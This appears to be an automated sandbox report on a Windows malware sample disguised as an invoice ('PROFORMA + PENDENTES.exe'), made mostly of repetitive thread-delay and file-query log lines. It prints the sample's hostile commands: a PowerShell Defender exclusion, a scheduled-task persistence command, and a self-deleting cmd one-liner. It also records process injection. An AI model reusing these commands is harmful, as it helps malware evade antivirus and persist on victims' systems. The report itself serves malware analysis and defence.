Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -596132s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -596031s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -595921s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -595812s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -595703s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -595593s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -595484s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -595375s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -595265s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -595156s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -595047s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -594937s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -594827s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -594716s >= -30000s
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe TID: 6736	Thread sleep time: -593751s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 598953	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 598719	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 596620	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 596391	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 596266	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 595935	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 595719	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 595391	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 595276	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 595156	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 595047	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 594938	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 594719	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 599672
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 599562
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 599453
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 599344
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 599219
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 599109
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 599000
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 598884
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 598780
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 598672
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 598562
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 598453
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 598343
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 598232
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 598124
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 598015
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 597905
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 597797
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 597687
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 597578
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 597468
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 597359
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 597250
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 597140
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 597028
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 596921
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 596812
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 596703
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 596593
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 596483
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 596374
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 596265
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 596132
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 596031
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 595921
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 595812
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 595703
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 595593
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 595484
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 595375
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 595265
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 595156
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 595047
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 594937
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 594827
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 594716
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Thread delayed: delay time: 593751

Source: PROFORMA + PENDENTES.exe, 0000000B.00000002.1632314031.00000000064AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: WYqxTmjfOgdZ.exe, 00000010.00000002.1689779912.0000000000E37000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
Source: PROFORMA + PENDENTES.exe, 0000000B.00000002.1628343942.0000000001057000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe"
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Memory written: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Memory written: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WYqxTmjfOgdZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3E72.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process created: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process created: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process created: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WYqxTmjfOgdZ" /XML "C:\Users\user\AppData\Local\Temp\tmp5B41.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process created: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe "C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3

Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Queries volume information: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Speech\v4.0_4.0.0.0__31bf3856ad364e35\System.Speech.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
